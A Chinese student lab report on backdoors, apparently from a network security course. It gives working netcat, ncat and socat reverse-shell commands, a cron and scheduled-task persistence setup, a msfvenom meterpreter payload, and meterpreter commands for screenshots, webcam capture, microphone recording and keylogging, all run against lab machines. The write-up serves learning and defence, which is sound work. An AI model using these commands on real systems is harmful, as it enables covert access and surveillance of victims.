(1)例举你能想到的一个后门进入到你系统中的可能方式?
下载软件时,后门捆绑在下载的软件上,与软件一起安装进入了系统(2)例举你知道的后门如何启动起来(win及linux)的方式?
Windows:用户自己运行了后门软件、设置了任务计划启动
linux:设置了cron启动,在到达规定的时间时后门启动
(3)Meterpreter有哪些给你映像深刻的功能?
最可怕的就是使用靶机的摄像头进行拍照和录像吧。感觉在电脑前的一举一动都能被攻击主机掌握。另外就是获取目标机键入信息的功能。确实十分强大,攻击方可以掌握我们输入的所有东西,像输入的密码、发送的消息什么的已经不算是秘密了。
细思极恐,好像只要黑客想知道的东西没有他没办法搞定的。我们这样一个简单的后门软件都能有如此强大的功能。应该是学好网络攻防,走遍天下都不怕了。
(4)如何发现自己有系统有没有被安装后门?
简单的方法就是通过杀毒软件杀毒吧。还可以查看进程列表,注册表。
完成这次实验后,掌握了打开不同操作系统下打开后门的方法,学会了如何在linux下生成一个后门软件,通过实践熟悉了meterpreter的各个命令的使用方法和功能。另外,通过这次亲身实践,也体会到了黑客软件功能的强大,作为普通计算机用户的我们只要稍不留神,身上的大量信息就有可能被黑客盗取。这也从一方面说明了学好这门课程的重要性,不只是要懂得如何完成攻击,更重要的是要通过学习掌握预防攻击,反抗攻击的方法。真是实践出真知啊!
Windows获取linux的shell:
1、在Windows下查看主机的ip地址
2、ncat.exe -l -p 4303 打开监听
3、nc 192.168.75.129 4303 -e /bin/sh 在linux下反弹式连接到Windows
4、Windows获得了linux的shell
linux获得Windows的shell:
1、查看linux的ip地址
2、nc -l -p 4303打开监听端口
3、ncat.exe -e cmd.exe 192.168.75.128 4303 让Windows连接到linux上
4、linux获得了Windows主机的shell
cron启动:
1、Windows打开监听端口
2、用指令crontab -e 对定时任务进行编辑。将最后一行修改为
45 * * * * /bin/netcat 192.168.75.129 4303 -e /bin/sh3、等到每个小时的45分时,linux会自动打开后门,获取linux的shell
1、新建一个触发器,开始任务选择工作站锁定时。
2、新建操作,选择启动程序,程序定位到socat.exe,参数填
tcp-listen:4303 exec:cmd.exe,pty,stderr3、按ALT+L锁定计算机用户,使新建的操作触发
4、此时,在linux端下使用命令socat - tcp:192.168.75.129:4303连接到Windows主机,获取Windows的shell
1、使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.129 LPORT=5215 -f exe > 20144303.exe自动生成一个后门程序
2、windows打开监听端口,等待linux传输后门文件
3、kali端将后门软件传输给Windows
1、输入msfconsole进入msf控制台
2、修改IP地址和端口号
3、在windows下打开后门软件
4、使用exploit命令对Windows进行攻击
5、攻击成功,kali获得了Windows的shell
6、screenshot命令截取目标机的屏幕
7、使用摄像头拍照、录像。(不知为何失败了)
8、使用命令record_mic截取一段音频
9、使用命令keyscan_start和keysca_dump捕获靶机的键入信息
10、查看当前用户
11、查看文件
12、命令靶机关机
转载于:https://www.cnblogs.com/20144303sys/p/6583059.html
相关资源:扑克牌斗24点游戏系统设计与实现 C语言